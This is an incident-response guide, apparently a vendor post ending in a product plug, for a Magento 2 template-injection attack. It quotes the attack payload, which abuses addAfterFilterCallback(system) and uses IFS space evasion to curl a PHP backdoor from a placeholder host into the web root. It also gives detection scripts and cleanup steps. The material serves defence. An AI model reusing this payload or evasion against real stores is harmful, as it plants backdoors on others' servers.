Responding to a Magento Script Injection Attack


Script Explanation


We'll investigate the script below, which was taken from an attempted attack on a Magento 2 website. The script
attempts to inject and execute dangerous commands on your Magento server, potentially compromising the entire system. Here's a breakdown of what it does:

{{var this.getTemplateFilter().filter(order)}}
{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394)}}


Breakdown of the Script

  • {{var this.getTemplateFilter().filter(order)}}: This portion appears to be a benign call to the template filter that processes order data. It is used here as a disguise to make the payload look less suspicious.

  • {{var this.getTemplateFilter().addAfterFilterCallback(system)}}: This registers system as a callback to run on the filter's output, so the filtered string is handed to the shell. It is the beginning of the command injection.

  • cd${IFS%??}pub: Changes the working directory to pub, the web root of your Magento installation. ${IFS%??} is the shell's Internal Field Separator (IFS) with its last two characters stripped; with the default IFS (space, tab, newline) it expands to a single space, so the command runs without any literal spaces and slips past simple filters that reject them.

  • curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394: This is the critical part of the script. It uses curl to download a file from the attacker's server (x.x.x.x stands for the real IP address or domain) and saves it as cache.php in the pub directory. Because pub is the web root, the downloaded PHP file is directly reachable over HTTP and can be executed later.


This script essentially injects a backdoor into your Magento installation by placing a potentially malicious PHP file in a publicly accessible directory. Once in place, the attacker can execute this script to compromise your site further.
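As an added example (not code from the original post or from any Magento component), the following detector recognises the payload shape described above in a block of template text: it finds {{var ...}} directives that register an addAfterFilterCallback, pulls out the argument passed to .filter(...), undoes the ${IFS...} whitespace evasion so the command is readable, and lists any URLs it would fetch. The regexes and the constructed SAMPLE payload (with the page's x.x.x.x placeholder host) are my own.

```python
import re

# Patterns are mine, written for the payload shape discussed above (not Magento's code).
DIRECTIVE_RE = re.compile(r"\{\{\s*var\s+(.*?)\}\}", re.DOTALL)
CALLBACK_RE = re.compile(r"addAfterFilterCallback\(\s*(\w+)\s*\)", re.IGNORECASE)
FILTER_ARG_RE = re.compile(r"\.filter\((.*)\)\s*$", re.IGNORECASE | re.DOTALL)
IFS_RE = re.compile(r"\$\{IFS[^}]*\}")          # ${IFS}, ${IFS%??}, ${IFS%%??}, ...
URL_RE = re.compile(r"https?://[^\s'\"]+")

def normalize_shell(cmd: str) -> str:
    """Turn IFS-based whitespace evasion back into plain spaces for the analyst."""
    return IFS_RE.sub(" ", cmd)

def analyze(text: str) -> dict:
    """Summarise code-execution indicators found in Magento template text."""
    result = {"callbacks": [], "commands": [], "urls": [], "malicious": False}
    for body in DIRECTIVE_RE.findall(text):
        cb = CALLBACK_RE.search(body)
        if not cb:
            continue                                  # plain {{var ...}} output, no callback
        result["callbacks"].append(cb.group(1))      # e.g. "system"
        arg = FILTER_ARG_RE.search(body)
        if arg:
            cmd = normalize_shell(arg.group(1))      # string that reaches the callback
            result["commands"].append(cmd)
            result["urls"].extend(URL_RE.findall(cmd))
    result["malicious"] = bool(result["callbacks"])
    return result

# Constructed sample: the payload from the post, host kept as the x.x.x.x placeholder.
SAMPLE = ("{{var this.getTemplateFilter().filter(order)}}"
          "{{var this.getTemplateFilter().addAfterFilterCallback(system)"
          ".filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}"
          "http://x.x.x.x/cache.php?m=8089-28808-12394)}}")

if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```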

How to Check if the Script was Successful

To determine if the malicious script was successfully executed on your Magento server, follow these detailed steps:

1. Check for the Presence of Malicious Files

Navigate to the pub directory of your Magento installation and look for a file named cache.php or any other unfamiliar PHP files. You can use the following command in the terminal:

cd /path/to/magento/pub
ls -l

If you find the cache.php file or any suspicious files, this is a strong indicator that the script was successful.

2. Check the Last Modified Date and Time of Files

Reviewing the last modified dates of files, especially in the pub directory, can help you identify when a file was added or changed. This can indicate whether a file was part of the attack. Use the following command to check the last modified date and time of all files in the pub directory:

cd /path/to/magento/pub
ls -lt

This command will list all files in the directory, sorted by modification time, with the most recently modified files at the top. Look for any files that were modified at unusual times, especially if they align with when you suspect the attack occurred.

You can also check a specific file’s last modified time using:

stat cache.php

This command will show detailed information about the file, including the last modification time.

3. Review Server Logs

Examine your web server logs for any signs of unauthorized access or unusual activity, especially around the time you suspect the script might have been executed. Check both access logs and error logs (the paths below are for Apache on Debian/Ubuntu; nginx typically logs under /var/log/nginx/):

tail -n 1000 /var/log/apache2/access.log
tail -n 1000 /var/log/apache2/error.log

Look for requests to the dropped file (for example GET /cache.php), for the injected template text (addAfterFilterCallback or ${IFS) where request data is logged, and for the download URL from the script (http://x.x.x.x/cache.php?m=8089-28808-12394). The curl command itself runs on the server rather than over HTTP, so it will not appear in the access log; it may leave traces in the PHP or system logs instead.

4. Inspect the Magento Database

The script might have been used to inject malicious content into your Magento database. Check your database for any unfamiliar entries, especially in the following tables:

  • core_config_data
  • admin_user
  • customer_entity


To query your database, you can use the following MySQL command:

mysql -u username -p
USE magento_db;
SELECT * FROM core_config_data WHERE path LIKE '%cache.php%';


Replace username with your MySQL username and magento_db with your Magento database name. If you find any suspicious data, it could mean the script successfully manipulated your database.

5. Monitor for Unusual Network Activity

Check your server's network activity to see if there have been any unexpected outbound connections. This can indicate that a malicious script is communicating with an external server:

netstat -an | grep ESTABLISHED


Look for any connections to unfamiliar IP addresses or domains, particularly those matching the URL in the script.
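As an added example covering checks 1 to 3 above (not code from the original post), this script lists PHP files under pub that were modified within a window or carry the dropped file's name, and flags access/error log lines that match the indicators from the attack. The pub tree and log lines it runs on are constructed inline for the demo; the indicator host is the page's x.x.x.x placeholder, and the pattern list is my own.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Indicators taken from the payload discussed above (host is the page's x.x.x.x placeholder).
DROPPED_FILE = "cache.php"
IOC_PATTERNS = [re.compile(p) for p in (
    r"/cache\.php",                                  # requests to the dropped file
    r"addAfterFilterCallback",                       # injected template directive
    r"\$\{IFS",                                      # IFS whitespace evasion
    r"x\.x\.x\.x/cache\.php\?m=8089-28808-12394",    # download URL from the script
)]

def recent_php_files(pub_dir, since_epoch=None):
    """(relative path, mtime) for PHP files under pub/ modified at or after since_epoch
    (default: last 24 hours) or named like the dropped file, newest first."""
    since = time.time() - 86400 if since_epoch is None else since_epoch
    root = Path(pub_dir)
    hits = []
    for path in root.rglob("*.php"):
        mtime = path.stat().st_mtime
        if mtime >= since or path.name == DROPPED_FILE:
            hits.append((path.relative_to(root).as_posix(), mtime))
    return sorted(hits, key=lambda h: h[1], reverse=True)

def suspicious_log_lines(lines):
    """(line number, line) for access/error log lines matching any indicator."""
    return [(n, ln) for n, ln in enumerate(lines, 1)
            if any(p.search(ln) for p in IOC_PATTERNS)]

def build_sample_pub():
    """Constructed pub/ tree for the demo: one old legitimate file, one fresh drop."""
    root = Path(tempfile.mkdtemp(prefix="pub_"))
    legit = root / "index.php"
    legit.write_text("<?php // legitimate front controller\n")
    old = time.time() - 30 * 86400
    os.utime(legit, (old, old))                      # backdate to 30 days ago
    (root / DROPPED_FILE).write_text("<?php // constructed stand-in, not real malware\n")
    return root

# Constructed log lines (not from a real server): an ordinary request, an access-log
# hit on the dropped file, and an error-log line echoing the injected template.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2024:10:00:01 +0000] "GET /catalog/product/view/id/42 HTTP/1.1" 200 9812',
    '203.0.113.5 - - [01/Aug/2024:10:01:30 +0000] "GET /cache.php HTTP/1.1" 200 512',
    '[Thu Aug 01 10:01:12 2024] [php:warn] template error near {{var this.getTemplateFilter().addAfterFilterCallback(system)',
]
```

Run it against a real store by pointing recent_php_files at /path/to/magento/pub and feeding suspicious_log_lines the lines from your access and error logs.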

What to Do If the Script was Successful

If you find evidence that the script was successful, follow these steps to secure your Magento store:

1. Isolate the Affected Server

Immediately disconnect the affected server from the network to prevent further damage or data leakage. This will help contain the threat.

2. Remove Malicious Files

Manually delete any malicious files you identified, such as cache.php in the pub directory:

rm /path/to/magento/pub/cache.php

Also, check other directories for any suspicious files and remove them.

3. Restore from Backup

If possible, restore your Magento store from a clean backup made before the attack occurred. This is the safest way to ensure all traces of the malicious script are removed.

4. Change All Credentials

Change all passwords for your Magento admin, database, FTP, and any other accounts associated with the affected server. If the attacker accessed your system, they could have compromised these credentials.

5. Patch and Update

Ensure your Magento installation, as well as any extensions, are fully updated to the latest versions to patch known vulnerabilities. This reduces the risk of similar attacks in the future.

6. Implement Security Measures

Enhance your Magento store's security by installing a Web Application Firewall (WAF), enabling Two-Factor Authentication (2FA), and using security-focused extensions like ScriptGuard Pro.

7. Scan for Malware

Run a thorough malware scan on your server to detect any other potential threats. Use tools like ClamAV or a dedicated Magento security scanner.

8. Monitor for Recurrence

After taking these steps, closely monitor your server and Magento store for any signs of recurring attacks or suspicious activity. This ongoing vigilance is crucial in the aftermath of an attack.

How ScriptGuard Pro Blocks This Attack

ScriptGuard Pro can prevent such attacks by blocking the injection of malicious scripts into your Magento store. It does this by filtering out dangerous characters and commands before they can be executed, ensuring your store is protected from unauthorized code execution.

To find out more details on how to protect your Magento store using ScriptGuard Pro, please visit https://www.lecsoft.co.uk/scriptguardpro.html